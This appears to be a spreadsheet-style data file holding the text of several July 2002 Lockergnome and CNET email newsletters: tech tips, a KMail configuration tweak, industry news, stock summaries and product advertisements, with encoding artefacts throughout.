Â GnomeTIPGnomies are known for their willingness to help others and Alex Warren is no exception with a tip on copying text. Alex writes: "Did you know that you can copy the contents of a message/dialog box just by pressing Ctrl+C?" Alex also had this to say: "When you select text and then use the mouse to drag it to a new location, the original text moves to the new location and disappears from the old location. However, you can select text and then use the right mouse button to drag it to a new location. When you do this, releasing the right mouse button opens a menu from which you can choose to move or copy the text (along with several other options)." Those are some great time saving tips Alex! Following suit with using Ctrl + C to copy... you can also use Ctrl + X to cut and Ctrl + V to paste. You can also use all these tips on more then just text! The next time you need to copy some files on your PC, try the right-click and drag method and you will see what I mean... along with saving yourself some time.
Recommend It!http://www.lockergnome.com/issues/daily/20020718.html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how Sprocket thinks he has a right to eat pumpkin seeds. Or, would that be "pupkin" seeds?Not for the Puppy
Â 
CLICK HERE TO ZOOMÂ Â 
BYTE ME NOWÂ©2002, Lockergnome LLC. ISSN: 1095-3965. All Rights Reserved. Please read our Terms of Service. Our Web site is hosted by DigitalDaze. Domain registered at DNS Central.Bacteria acts more intelligent than human beings.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</si>
  <si>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20020718 Lockergnome Tech SpecialistÂ  07.18.2002 GnomeREPORT 
Keep your Web site working fast and smart with UltraDNS. More reliable
performance means more traffic, more sales, and more profits. Outsource your
DNS management and save. Basic DNS for only $1.00 a month. 
Click here to
find out more.
I thought I baked my Dell PowerEdge 1400SC server yesterday 
when it refused to boot completely. I borrowed a data vac 
from a friend and decided to clean all of the dust and cat 
hair from my systems, then after reconnecting everything, 
the server would boot to the initial splash screen, where 
there is a POST progress bar, but would not proceed past 
past about the first 1/5th of the bar. Uh-oh. What did I 
fry?As it turns out, it was another case of "always check the 
small stuff". Oh, I had all of the cables plugged back in to 
the server properly, I checked all of that, but it didn't 
dawn on me until about a half dozen boot attempts later that 
I should probably turn an eye toward the other end of the 
cables. That server is connected to an 8-port Compaq KVM 
switch and with all of the yanking, plucking and shuffling, 
the keyboard cable had been eeked out of the switch just a 
tad. Why the server didn't display a keyboard warning 
message like every other computer on the planet, I can only 
attribute to the BIOS developers. Server Satchel, running 
Red Hat Linux 7.2 is now operating as it was previously. The 
penguin is happy. The server case is even black. How 
appropriate...See You in August,Â Â Â Â Â Â Â Â Â Â Â Â Â Â Randy NielandÂ Â Â Â Â Â Â Â GnomeNETWORK
Windows XP Security Checklist
Finely crafted by Bernie Klinderhttp://www.labmice.net/articles/winxpsecuritychecklist.htm
With all of the security features crammed into Windows XP, 
where does one start? Do you need VPN capability? Is NTFS an 
appropriate file system choice for you? Is there any value 
at all in Simple File Sharing? After much hounding, Bernie 
Klinder has drawn up a healthy checklist of things you need 
to address under Windows XP in order to maintain a system 
that is both security and compatible with the rest of your 
computing world.
Â GnomeSYSTEM
ATI Still Makes Video Cards?
http://www.anandtech.com/video/showdoc.html?i=1656
Say it isn't so! Yes, apparently they do still have 
something to say about NVIDIA's dominance in the video card 
market. Seeing as how they've been all but dumped by the 
majority of top-tier system makers, it's hard to believe 
that they are capable of a serious comeback. Judging from 
what AnandTech has to say about the forthcoming R300-based 
cards, it appears that they haven't thrown in the towel just 
yet. I'm all for competition, so I welcome the effective re-
entrance into the high end market. Let's all hope that their 
driver development has improved as much as their hardware 
seems to have.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Â GnomeALERTZ
Today's Top 5 kbAlertzQ292108 - WD2002: GetSpellingSuggestions Method Does Not List Non-English Language Suggestions (Q292108)
Q290981 - WD2002: "File Conversion Encoding" Dialog Box Appears When You Open Text File (Q290981)
Q290969 - WD2002: Run-Time Error 5 When You Use Mid(), Left(), or Right() Function (Q290969)
Q290967 - WD2002: Cannot Place a Bullet in the Middle of a Sentence or Paragraph (Q290967)
Q201953 - WD2000: Macro to Find Automatic (Soft) Page Breaks (Q201953)
Recommend It!
Â GnomeASSISTANT
Technical Censorship
http://news.com.com/2100-1023-944315.html
Odd. I liked that cup of Mocha (spelled M-O-C-H-A and I'll explain in a minute) I drank at Starbucks when Jake and I visited last week, but if I wanted to relay that to someone using a Yahoo email account, you might see an alternate word. Thus the additional hyphenated spelling just in case those of you using Yahoo to subscribe to Lockergnome actually received your issues and the word has been altered to suit their personal opinion of my choice in drinks. They've also had a terrible time interpretting our W3C standardized HTML lately, dropping in copious #message references throughout the text in their new Beta email client. So why the text replacement? It's another filtering technique to stop certain words that might relate to JavaScript functions. I guess I'll have to choose another beverage next time. Silly me.Â GnomeSTUFF
Yer Kidding... Really?
http://www.theregus.com/content/4/25629.html
I'm all sorts of sarcastic today, aren't I? Those of us 
that have had to manage budgets are used to dealing with 
math in terms of hardware, software, maintenance and 
personnel costs. It's not really that difficult. It's 
certainly not hard to see that dropping a free version of 
Linux on a server with less hardware requirements just to do 
some file sharing, printing and maybe an Intranet page or 
three is far cheaper than using Windows. At very long last, 
Microsoft has admitted as much. Of course, they're quick to 
point out that they have much more to offer than Linux, 
which may indeed be true. But at the end of the day, when 
you compare donuts to donuts and like functions against one 
another, Linux is cheaper. For a shop of Windows-trained 
staff, dealing with Linux will certainly be a challenge, 
requiring additional training, suffer the odd blunder here 
and there, and be less forgiving when it comes to detailed 
configuration. On the same token, make a Linux whiz use 
Windows and see how quickly you'll be searching for a 
replacement. Cheap is in the budget of the beholder.
Recommend It!http://www.lockergnome.com/issues/techspecialist/20020718.html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</si>
  <si>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CNET | News.contextÂ Search
	                Â 
	                Â 
News.com
	                All CNETÂ Â Â Â 
	                The Web
                Â Live tech help NOW!
April's tech award
1 million open jobs
News.com: Top CIOs 
ZDNet: PeopleSoftJuly 18, 2002
Adios to options excess?
If the nation's politicians expect Silicon Valley to fall in line on the issue of expensing stock options, they're living in a fantasy world.
		Flipping through my Rolodex this past week, I couldn't find one solitary technology type willing to support even the mildest proposal to change how corporations account for stock options. The more common response was a verbal "middle finger" shouted in the general direction of Washington.
				No surprises, there. The options argument is not just about putting food on the table--make that a lot of food, in some cases--but about the way the computer industry views itself. Tech companies believe they belong in a different category, say, from the likes of Coca Cola, Washington Post Co. and Bank One Corp.--all which recently decided to begin expensing stock options.
				Tech titans also served notice they will remember to support friends--and shun foes--in Washington next November. An empty threat? Perhaps, but consider this: in the last national election, the computer industry contributed more than $40 million (52 percent to Democrats, 46 percent to Republicans.) That was good for a seventh place ranking, according to the Center for Responsive Politics.		
Charlie Cooper, Executive Editor/Commentary
		Â 
Why the options party is overTransamerica Investment Management portfolio manager Kenneth Broad says
it's easy to see why the tech industry is fighting so hard to keep options from
being expensed: no one likes to lose a free lunch.
Read Full Story We can handle CEO cheatsThe Bush administration has crafted its own proposals for dealing with excess and dishonesty in corporate life. Commerce Undersecretary Phil Bond, who spoke with CNET News.com, believes the President's plan is just the ticket to get executives to come clean.
Read Full Story Why free downloads help, not hurtRecording artist Janis Ian throws down the gauntlet to the National Academy of Recording Arts &amp; Sciences (home of the Grammy Awards) and the Recording Industry Association of America. Making the case for the salutary benefits of free digital downloads, she says the music industry is dancing to the wrong beat.
Read Full Story 
A CTO's worst nightmareAfter the Sept. 11 terrorist attacks, anxious investors worried when the stock market's largest financial exchange would open again. New York Stock Exchange CTO Roger Burkhardt was on the job faster than a trader can say "buy." 
Read Full Story Fact and fiction in the Web services debateSun versus Microsoft, Java versus .Net, McNealy versus Gates. Does it all really matter, Iona Technologies CEO Barry Morris asks, when it comes down to what users want. The future of Web services, Morris says, is being held hostage amid a fruitless debate over industry politics.
Read Full Story Rewiring the FBI for the 21st centuryWhen it comes to the digital age, the FBI is stuck with tools left over from the old days. That's why the FBI is hoping for big things from its new CIO. Darwin John tells CNET News.com about his plans for revitalizing the Bureau's dated IT infrastructure. But this long-time outsider must first learn to navigate his way through the bureau's treacherous bureaucracy.
Read Full Story Â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</si>
  <si>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20020717 Lockergnome Penguin ShellÂ  07.17.2002 PenguinREPORT
CAREER SERVICES FROM LOCKERGNOME AND DICE.COM: We've teamed up with
Dice.com to bring you a full service I.T. career enhancement solution.
Whether you are looking for your
dream 
job
or trying to
hire 
talented people,
the full-featured career resource center is the place to start. Find your
IT talent 
solution
today!I've very excited about the in-planning Penguin Shell volunteer project. 
Apparently, you are too. I've received more than 100 emails from readers volunteering a wide range of IT skills for charitable organizations. 
Linux users, Windows users, even a few Mac users are ready, willing and able to 
spend their own precious off time providing qualified technical skills for a 
good cause. I've also gotten more than two dozen suggestions for organizations that might be in need of such skills. And, I've 
seen some very interesting suggestions for names for our project. Feel free to click through on any of the 
above links to join the ever-growing bandwagon. Do me a favor, though. keep the 
subject lines intact. It's the only way your messages will filter and sort 
through my email system.It looks like Apple may have crossed a line of irritation with its users. 
According to this article on The Register, Apple has tacked a $100 annual fee on its
previously free mac.com email service. It's also set the price for an OS 10.2
upgrade at $129.I won't question Apple's decision too much. Instead, it really proves how 
difficult things have become in the tech world in the past few years. Revenues, 
by and large, are still decreasing from the pie-in-the-sky late 90s and early 
2000. That's left companies to scramble for new sources of income, some of which 
were previously free. Even we at Lockergnome have felt the pinch in the past few 
years. Never fear, though. Chris has assured us that the newsletters will remain 
free. We have, however, begun to explore alternative income sources.On a brighter note, it looks like Mandrake has found a sweet spot. According to their most 
recent shareholder's report, the third quarter was the strongest in the 
company's
history, with 1.6 million Euro (1.61 million US) in revenue. That doesn't put
them in the black, though. According to MandrakeSoft, the strong quarter will
only decrease operating losses. I have to wonder how much of this revenue was
the result of the Mandrake Linux User's
Club.The news also makes me want to pay a bit more attention to Mandrake's newest
partnership venture, an agreement with Microtel to provide Mandrake-loaded computers for sale on WalMart.com.
I would never have guessed that WalMart would lead the consumer Linux machine
charge. They've had Mandrake boxes available for several months. Now, with the 
addition of both Lindows 
and Mandrake-equipped computers, they seem surprisingly ahead of the retail 
computer pack. Let's hope for the best for all involved.Have a great Wednesday.
Tony
Steidler-DennisonÂ Â Â Â Â Â Â Â GnomeTWEAK
Lockergnome readers, SAVE 50% on the Computing Encyclopedia!
Are you looking for the ultimate computing resource? Discover the
Computing Encyclopedia from Smart Computing.  Regular price $59,
SPECIAL OFFER for Lockergnome readers,
get 
your set TODAY, ONLY $29.95!Checking Mail With KMailI've recently become a KDE convert - impressed enough with KDE-3 to move me from my longtime desktop friend Gnome. While I use a combination of fetchmail, 
procmail and pine for reading and filtering my email, KMail is a strong 
contender in the email race. As you'd guess, it's fully integrated into the KDE 
desktop, ready for a quick setup and easy use.There's one drawback to KMail, though, in my opionion. That's that it doesn't 
automatically check your email by default when the program is opened. As much 
time as I spend talking about saving key and mouse strokes, you knew the 
additional step to check your email after opening the program would be an 
irritation to this Penguin. However, changing the problem is a quick and simple 
configuration issue.To force KMail to check your email when opened, right-click on the KMail icon in your KDE panel. Select "Preferences" and the "Execute" tab. In the Execute 
window, change the command line to read:Â Â Â Â kmail --check -caption "%c" %i %mThe addition of the --check option will force KMail to bring you your mail when 
you open the program.Fewer keystrokes make a happy geek, right? 
Recommend It!
Send us a 
GnomeTWEAKÂ GnomeCORE
Kernel Configuration - Part XIIIAs you well know, Linux is simply the most robust operating system for 
networking around. With its roots squarely in the network, Linux has managed to 
stay ahead of the pack in virtually every respect related to networks. It should come as little suprise, then, that the network section of your Linux kernel 
configuration is dense with details and options.I will say that I warned you on Monday - there are going to be some sections of 
the kernel configuration series where I just can't give you a stock 
configuration that will work in every case. Networking is one of those areas. 
You're going to have to give some thought as to how your network is or will be 
used and the level of security you want to provide (both internal and external). Then, it's a matter of finding the solutions to those options.For security issues, I can recommend several good articles and HowTos:
The Linux Security Quickstart HowTo
Â Â covers security on a high level, with a good discussion of kernel 
configuration issues
Linux Network Security from Linux Planet
Â Â a nice tutorial on network security
Network Security with /proc/sys/net/ipv4
Â Â other approaches to network security
These should get you started. Tomorrow, we'll cover telephony support in your 
Linux kernel.
Recommend It!
Send us a GnomeCORE 
tipÂ GnomeFILE
PyMP3Cuthttp://www.librelogiciel.com/software/PyMP3Cut/"PyMP3Cut is a Python commandline tool designed to cut huge (&gt; 100MB) MP3 files 
at high speed without requiring the extra disk space and processing time usually needed by visual audio editing tools, which convert the MP3 format to more 
easily manageable formats like WAV before doing anything. It reads and cuts 
simultaneously according to the autodetected MP3 frame rate and a timeline 
passed as a commandline argument."
Recommend It!
Send us a GnomeFILE 
suggestionÂ GnomeVOICE
More Windows for Linux
Scribbled by Ken Knull"I'm reading your Codeweavers/CrossOver project stuff, and have comments
on another option I use."I have been using Win4Lin ( http://www.netraverse.com/ ) for several
months now, on an i686 boxen which runs RH 7.2, and now also
most windoze (nonXP / NTFS apps)."I love it, and highly recommend it, and if you'd like more details /
data let me know."
Recommend It!
Speak your 
GnomeVOICEÂ GnomeCLICK
Linux PR
http://linuxpr.com/If the daily Linux news sites are starting to get you down, maybe it's time for 
a change. Linux PR is an up-to-the-minute listing of events and developments in 
the Linux world. The layout is attractive, with all the most recent articles in 
descending order on the front page. It makes quick scans easy. The only real 
downside to the news on the site is that some of it is very, very 
company-oriented - clearly the work of PR firms cranking out press releases. 
Other than that, Linux PR is a useful site for checking in and keeping up on 
your favorite OS.
Recommend It!
Suggest a 
GnomeCLICKhttp://www.lockergnome.com/issues/penguinshell/20020717.html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Win a Digital Camera
Â General Feedback
Â Chris's Blog
Â E-mail the Editor
Â GNOMESPECIALS
Â Manage Your Workgroup
Â Form Pilot
Â Say the Time 5.0
Â Boomer - Stream Now
Â Create Web/CD 
catalog
Â Easy Web 
Editor
Â Kleptomania
Â Tag&amp;Rename
Â Pretty 
Good Solitaire
Â Visualize Color Combos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
</t>
  </si>
  <si>
    <t xml:space="preserve">Selling secure laptops no open-shut caseÂ Search
	                Â 
	                Â 
News.com
	                All CNETÂ Â Â Â 
	                The Web
                Â Live tech help NOW!
April's tech award
1 million open jobs
News.com: Top CIOs 
ZDNet: PeopleSoftJuly 18, 2002Selling secure laptops no open-shut caseApple's harvest: New iPods, bigger iMac and moreMicrosoft unbundles directory technologyPittman set to leave AOL Time WarnerTech activists protest anti-copyingEarnings alert: Handspring trims lossÂ PerspectivesThe options party is over
Kenneth Broad says it's easy to see why the tech industry is fighting to keep options from being expensed.
Read Full Story
Selling secure laptops no open-shut caseRop Gonggrijp admits that it's not a promising time to start an Internet privacy company.
The founder of NAH6 knows all about flops such as Privada, abandoned software such as PGP and SafeWeb, and struggling firms such as Zero Knowledge.
July 18, 2002, 4:00 AM PT
 | Read Full Story Apple's harvest: New iPods, bigger iMac and moreAs the Mac faithful gather in New York, Apple CEO Steve Jobs rallies to the defense of the Mac OS X operating system and trots out new hardware, including a bigger iMac and iPods for Windows. But the company heads into murky waters with its .Mac Web services plan.
July 18, 2002, 10:50 a.m. PT
 | Read Full Story Microsoft unbundles directory technologyMicrosoft will begin selling its directory technology as a standalone product separate from the Windows operating system.
Microsoft will continue to build in its "Active Directory" as part of Windows, but will give its customers the new option of buying the technology as a separate product next year, Microsoft executives said this week. The directory technology essentially provides a network manager with a central database to store and manage information about users, computer systems and networking devices. Microsoft competes against Novell and Sun Microsystems in the directory-server software market.
July 18, 2002, 11:30 AM PT | Read Full Story 
Pittman set to leave AOL Time WarnerAOL Time Warner is expected to announce after the stock markets close Thursday that embattled chief operating officer Robert Pittman will relinquish his role as the media behemoth's No. 2 executive, according to a source close to the company.
Pittman, who also serves as the interim chief exective of the company's America Online unit, could remain at the online division until a permanent CEO is found. But the timetable for Pittman's departure will be based on his own decision, the source added. AOL Time Warner last week confirmed that it hired executive search firm Spencer Stuart to head AOL's CEO search.
July 18, 2002, 12:05 PM PT
 | Read Full Story Tech activists protest anti-copyingEnthusiasts of free software disrupted a Commerce Department meeting Wednesday, insisting on their right to debate the entertainment industry over anti-copying technologies.
About a dozen vocal tech activists in the audience challenged speakers, including Jack Valenti, head of the Motion Picture Association of America (MPAA), who equated piracy with theft and applauded digital rights management.
July 17, 2002, 5:55 PM PT
 | Read Full Story Earnings alert: Handspring trims lossRead the latest in earnings reports and financial news from some of technology's leading players. This page is updated as new reports are filed. Keep checking back for the latest.
July 18, 2002, 11:00 AM PT
 | Read Full Story 
From our partners:The view from Expedia's pilotBusiness Week
CEO Richard Barton on the online travel company's big plans for corporate-travel services--and on Barry Diller's takeover bid.
July 18, 2002
 | Read Full Story WorldCom feels the freezeBusiness Week
A quick reorganization and turnaround are looking ever less likely now that a New York judge has put $2.5 billion of its assets on ice.July 18,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New iPod does Windows
At Macworld in New York, Apple Computer CEO Steve Jobs shows off a new iPod that's thinner, cheaper -- and compatible with Microsoft Windows. 
 Watch Video
Â Â EnterpriseSAP's sales saggingEMC breaks evenTI boosts Sun's UltraSparc chipE-BusinessTech stocks wallow in earnings funkCorporations favor age, experienceE*Trade profit up on cost cutsCommunicationsKPNQwest network's shutdown imminentWorldCom may file bankruptcy next weekLevel 3 gives mixed signals on recoveryMediaRecord labels target Chinese portalsAOL's accounting scrutinizedSome Beijing Net cafes reopenPersonal TechnologyTrying to connect at MacworldATI uncovers comeback chipsApple's .Mac faces a hard sell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</si>
  <si>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Message Boards DispatchMessages
 All CNET
 The Web
Â 
1. Wireless
2. Computer Help
3. Speakeasy
4. Windows 98
5. PC Hardware
6. Windows Me
7. Computer Newbies
8. Downloads
9. Windows XP
10.Virus &amp; Security
				Check out the User Opinions on these Hot Products and then submit one of your own.
				Â 84%Â Â 16%Â (19 votes)
Sony DCR-TRV50 In Electronics: Camcorders94%Â Â 6%Â (2878 votes)
Ad-aware
In Downloads: System Utilities77%Â Â 23%Â (263 votes)
Guard-IE Ad Blocking Privacy Suite and Popup Killer
In Downloads: Online PrivacyMore User OpinionsComputer Problems? Try our Live Support from a Live technician!	.black {color: #000000; font-family: Verdana, Arial, Helvetica, sans-serif; font-style: normal; font-size: 11px; font-weight: normal;}
&lt;!--
function clearTextarea() {
	if ((document.QuestionEntry.Question.value == "Type here and click go.")) {
		document.QuestionEntry.Question.value = "";
	} else {
		return;
	}
}
//--&gt;Type here and click go.July 18, 2002 Dear Readers,
I'm sure you've seen those annoying X-10 cameras ads popping up left and right while surfing the Internet. One day, out of curiosity, I decided to check this bothersome company's Web site. To my amazement, I found that their miniature cameras are pretty darn tiny, and you can mount them practically anywhere. But what does the law says about using them? I wouldn't want anyone to invade my privacy with that sort of camera setup. Coincidentally, I ran across this interesting discussion about this in the Boards, where members were discussing these miniature cameras, called CCTVs, and the privacy concerns around them. So if you want more info or would like to leave your two cents' worth about this, send us a post. Besides, this information might keep you from getting caught on camera in an embarrassing situation. 
						Lee Koo
						CNET Community
						Got suggestions? Email me: messageboards@cnet.com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Cookie, anyone?
No, not the chocolate-chip type, but small data files that are written to your hard drive by some Web sites when you view them in your browser. So what are the benefits of cookies? Are they harmful? Can I get rid of them without messing up my computer? These and many other cookie questions are answered in these two discussions, so if you're curious, bite into it and find out more. To delete or not to delete cookies...your choice
Deleting cookies and keeping them off my computer
More Computer Help discussions
My browser home page gets hijacked every time!
Have you ever checked out a Web site only to find that the home page on your Internet browser had been hijacked by it and you can't change it back? This happened to one member. Fortunately for him, the expert advisor of the forums was there for his rescue. Take a look at how he and others solved the problem. More Computer Newbies discussionsPop-up ads, begone!
If you've downloaded some software in the past and noticed an unreasonable amount of pop-up ads, you may have picked up unauthorized software that serves pop-up ads while you surf. This can be pretty frustrating and annoying. Find out here about these unauthorized attachments and how to get rid of nasty pop-up ads.Removing Gator junk from my PC
More Security and Virus Alerts discussionsDigital vs. analog camcorders
Getting ready for that long summer vacation in Tahiti? Want to buy a camcorder and capture the whole thing on videotape? When you need buying advice, what better place to turn than to the forums? You'll always find someone there with advice that'll make your experience a little easier. In this thread, a member wondered what type of camcorder would be the best for his needs, digital or analog. If you're in the market for a new camcorder or already have one and can offer some tips, take a look at this discussion and add your voice. More Consumer Electronic &amp; Digital Camera discussions
Where's ScanDisk for Windows XP?
Now that Audiogalaxy has gone, what next?
Brand-new memory is missing/disappearing!Should I convert to Windows XP?
from Melinda Douch
Cannot forward pictures in e-mail
from Mariann Eppolito
A bunch of drive problems
from Darren Harris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</si>
  <si>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CNET Investor Dispatch
Quote LookupEnter symbol:Â· Symbol Lookup
Quotes delayed 20+ minutes
â€¢ My Portfolio
â€¢ Broker Reports
â€¢ IPOs
â€¢ Splits
â€¢ Messages
Â 
STIZ
3.5
45.77%
Â 
IIJI
4.75
35.71%
Â 
BOYD
4.24
35.03%
Â 
INPH
3.94
31.25%
Â 
EBSC
3.0
26.00%
Â 
NSIT
13.36
-43.72%
Â 
ITRI
14.82
-32.79%
Â 
GZBX
2.28
-25.49%
Â 
TTEK
10.4
-24.03%
Â 
GDYS
4.37
-23.20%
Live tech help NOW!
April's tech award
1 million open jobs
News.com: Top CIOs 
ZDNet: PeopleSoftJuly 18, 2002 DJIA8409.49 Â -132.99
 NASDAQ1356.95 Â -40.30
 S&amp;P 500881.56 Â -24.48
 CNETÂ TECH982.84 Â -24.59Techs lose again with Seibel earnings miss, AOL questions
Siebel Systems fell short of Wall Street's earnings expectations and offered a worse-than-expected outlook, helping to depress technology shares Thursday.Despite a forecast from IBM in line with analyst expectations, investors seemed more focused on reports of a possible management shake-up at AOL Time Warner and on a Washington Post story questioning accounting methods at America Online. CNET's Tech index shed 24.59 points, or 2.45 percent, to close at 982.84. The tech-heavy Nasdaq composite index fell 40.30 points, or 2.88 percent, to close at 1,356.95.Amid news The Conference Board's index of leading economic indicators held steady in June, broader markts also headed south. The Dow Jones industrials dropped 133.0 points, or 1.56 percent, to close at 8,409.4. The S&amp;P 500 slid 24.48 points, or 2.7 percent, to close at 881.56--another multi-year low.
AOL used unconventional business practices-Post 
America Online Inc. boosted its revenue figures through unconventional deals from 2000 to 2002, before and after its acquisition of Time Warner Inc., the Washington Post reported on Thursday.A chart printed in conjunction with the Post article shows a total of $270.1 million in unconventional deals.AOL TIME WARNER INC 12.45 -5.03% IBM posts sharp drop in quarterly profits 
International Business Machines Corp. on Wednesday said it eked out a second-quarter profit of just a few pennies a share as the world's largest computer maker took a $1.4 billion charge to exit money-losing businesses and cut jobs.But even without the big charge, earnings at IBM, which sells everything from computer software to microchips to computer services, fell sharply as corporations concerned about their own bottom lines cut back on technology spending.INTL BUSINESS MACHINES 72.05 1.92% Nokia sees slight rise in Q3 handset sales vs Q2 
Finnish telecom equipment maker Nokia said on Thursday it expected a slight rise in handset unit sales for both itself and the industry in the third quarter versus the April-June period."it will be a reasonable quarter, but it will not represent such a dramatic growth as what might have been seen in some previous years," Chief Executive Jorma Ollila told a conference call following the firm's second-quarter result.NOKIA CORP ADS 13.33 -5.59% 
Also from CNET
Real-time stock quotes from CNET News.com Investor.30-day free trial!
J.P. Morgan stays cautious toward Qwest in tech notes 7/18/02 
Analyst Marc Crossman repeats a "market performer" rating on the telecom firm and further lowers his estimates on what he sees as continued deterioration of Qwest's local and long-distance businesses. Crossman says Qwest could violate a bank agreement by the end of this quarter if it doesn't close a significant asset sale. And he argues the firm faces a funding shortage next year that can't be satisfied by selling its eastern directories businesses alone.QWEST COMMUNICATIONS INTL INC 2.74 14.64% 
Visit the Brokerage Center
Dell: PC Market Slow and May Stay So 
The stumbling economy continues to dampen demand for personal computers and could do so for the rest of the year, Dell Computer Corp. Chief Operating Officer Kevin Rollins said on Thursday.Despite the slow market, No. 2 computer maker Dell is gaining market share, partly because of the recent merger of Hewlett Packard Co. and Compaq Computer Corp., Rollins told reporters after Dell's annual shareholder meeting here.DELL COMPUTER CORP 26.0500 -1.10%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</si>
  <si>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
Auctions Weekly NewsletterAuctions
 All CNET
 T
he Web
Â 
Site
MapÂ 
â€¢Â 
Desktops
â€¢Â 
Notebooks
â€¢Â 
Components
â€¢Â 
Software
â€¢Â 
Input Devices
â€¢Â 
Networking
â€¢Â 
Handhelds
â€¢Â 
Printers
â€¢Â 
Memory
â€¢Â 
Storage
â€¢Â 
Electronics
â€¢Â 
Monitors
â€¢Â 
Modems
â€¢Â 
Scanners
â€¢Â 
Services
â€¢Â 
Digital Cameras
â€¢Â 
Accessories
â€¢Â 
MultimediaÂ Â Â Â July 18th, 2002
Olympus Brio D-100 1.3 MegaPixel Digital Camera
Â 
1.3 MegaPixel Resolution
8MB Smartmedia Card
Seamless 2X Digital Zoom
1280 x 960 Pixel Resolution
Auto Connect USB Function
Olympus TruePic TechnologyBidding starts at  $99Â Don't miss out, place your bid now! 
Â Â Kodak/Lexmark 1200dpi Printerw/FlashCard Reader &amp; Photo LCDâ€¢ Starting Bid $49Â Â Â Â Lexmark Z-82 Color Copier/Scanner/Printer Comboâ€¢ Starting Bid $1Â Â Â Â Gateway XP P4 1.5GHz/256MB PC-266/64MB AGP40GB 7200RPM/24x10x40x CD-RW PCâ€¢ Starting Bid $551Â Â Â Â Sony/Sun .28mm 20-inch Trinitron Monitorâ€¢ Starting Bid $9Â Â Â Â Hand Held Security Wand Metal Detectorâ€¢ Starting Bid $16.50Â Â Â Â Intel 900MHz/256MB PC-133/10X DVD-ROM/20GB PCâ€¢ Starting Bid $229Â Â 
Â Â Canon CanoScan N670U 48-Bit Flatbed Scannerâ€¢ Starting Bid $1Â Â Â Â P4 Celeron 1.7GHz/nVidia 32MB256MB PC-133/16x DVD/20GB PCâ€¢ Starting Bid $399Â Â Â Â Creative Sound Blaster Live! 5.1 Sound Cardâ€¢ Starting Bid $1Â Â Â Â Creative Blaster 56K PCI V.92 Fax Modem â€¢ Starting Bid $17.75Â Â Â Â Iomega Predator 4x4x6 External USB CD-RWâ€¢ Starting Bid $49.99Â Â Â Â NEC 21-inch .28mm Multi-Sync Monitorâ€¢ Starting Bid $9Â Â Please send all questions, comments, and concerns regarding the CNET
Auctions Newsletter to auctions@cnet.com and include the
Newsletter title in the subject line.NOTE: All product information, including prices, features, and
availability, is subject to change without notice.The e-mail address for your subscription isÂ qqqqqqqqqq-cnet-newsletters@spamassassin.taint.org
UnsubscribeÂ |Â Manage My Subscriptions
Â |Â FAQÂ |
Â AdvertisePrice comparisons |
Product reviews |
Tech
news |
Downloads |
All CNET services</t>
  </si>
  <si>
    <t xml:space="preserve">
Internet Services Weekly Newsletter
Reseller Accounts1.Â InfinologyÂ Corp., $592.Â ReadyHosting.com, $4.123.Â Aplus.Net, $79.954.Â OneÂ WorldÂ Hosting, $105.Â SuperbÂ Internet, $5More providersJuly 18, 2002
--Lindsey Turrentine
Senior editor
CNET Software and Internet
 Dear Readers,On the surface, it seems odd that Microsoft and AOL compete with
one another. After all, while Microsoft is a giant software
powerhouse, AOL Time Warner is totally different--a giant media
powerhouse. Nonetheless, they're at it again, working like crazy
to dominate the ISP space. While AOL is busy renovating the guts
of upcoming AOL 8.0, which will finally integrate the Netscape
browser, Microsoft is nipping at its competition's heels with MSN
8.0. Will Microsoft make enough improvements to finally catch up
with AOL? It just might. Find out more in our MSN 8.0 First
Take. Quick links to Services &amp; Prices from these companies
 This week in Internet ServicesEver heard of a type of lawsuit known as a cyberSLAPP? We hadn't either. A cyberSLAPP case
typically involves "a person who has posted anonymous criticisms
of a corporation or public figure on the Internet," according to
a coalition of privacy groups who are fighting to stop the
practice. Find out more.
First Take: MSN 8.0 BetaRedmond has been talking up the newest version of MSN for months,
and now, the proof"s in the pudding. Testers have their hands on
the beta of MSN 8.0, and so far, this ISP looks and works better
than past versions. The great No. 8 even has antispam tools and
improved parental controls. But will MSN topple AOL?
First Take: ICQ Lite AlphaOne of our biggest beefs with ICQ has always been its bloated
feature set. Now, the company has released a new lite ICQ that
sucks up far less system memory than the full-fat version--but at
what cost? We take an early look.Looking for a new DSL provider?The DSL Power Search makes it easier to find the perfect
broadband provider for your needs. With our search, you can
identify the DSL providers in your neighborhood, then compare
prices and plans to make sure your new connection meets with your
objectives without breaking your budget.Don't type that: Yahoo edits e-mailYahoo's filter hunts for words that could activate JavaScript,
then it replaces them.
Scient files for Chapter 11 
The Internet consultancy and former highflier is also selling
certain assets to SBI and Company, a professional services
firm.Online undercover!Unless you observe the proper safety rules, surfing the Net
could land you in hot water. These simple tips can help.
Tech Trends
Hardware
Software
Shopping
Downloads
News
Investing
Electronics
Web Building
Help &amp; How-Tos
Internet
Games
Message Boards
CNET Radio
Music Center 
Search  
 Internet Services
	All CNET
	The Web	
 The e-mail address for your subscription isÂ qqqqqqqqqq-cnet-newsletters@spamassassin.taint.org
UnsubscribeÂ |
Â Manage My Subscriptions
Â |Â FAQÂ |
Â AdvertisePrice comparisons |
Product reviews |
Tech news |
Downloads |
All CNET services        Copyright 2002 CNET Networks, Inc. All rights reserved.          </t>
  </si>
  <si>
    <t xml:space="preserve">
Shopper Newsletter: AlertsJuly 18, 2002 
From Computers4Sure.com iRiver's versatile SlimX just $149 
 From CDW Apple's groundbreaking iPod just $399Computers4Sure
iRiver SlimX iMP-350 
								â€¢ Ultra-slim, 16.7mm in width
								â€¢ Supports MP3/WMA/ASF/CD formats
								â€¢ Rechargeable batteries included
								Â Â Just $149
Sonicblue Rio Riot
								â€¢ Stores over 400 complete albums 
								â€¢ Built-in FM tuner/custom presets
								â€¢ Extra-large, backlit LCD 
								Â Â Just $300
TDK Mojo CD-MP3
								â€¢ Play up to 10 hours of music
								â€¢ 8-minute MP3 skip protection
								â€¢ Supports MP3, Audio CD
							    Â Â Just $125
Sonicblue Rio 600 (32MB)
								â€¢ Customize your music!
								â€¢ 32MB, supports MP3 and WMA
								â€¢ USB, PC/Mac compatible
								Â Â Just $97
 CDW
Apple iPod 
								â€¢ 5 Gig capacity
								â€¢ 3x optical/2.5 digital zoom
								â€¢ 6.5 oz
								Â Â Just $299
Sonicblue Rio One (32 MB)
								â€¢ Affordable MP3 player!
								â€¢ 32MB, USB, Mac/PC comp.
								â€¢ Upgradeable w/flash memory
								Â Â Just $100 
Imation RipGo
								â€¢ Palm-sized CD-R Drive
								â€¢ Plays CD, WMA, MP3, D-Audio
								â€¢ 6 hours WMA, 3 hours MP3
								Â Â Just $199  The e-mail address for your subscription isÂ qqqqqqqqqq-cnet-newsletters@spamassassin.taint.org
UnsubscribeÂ |
Â Manage My Subscriptions
Â |Â FAQÂ |
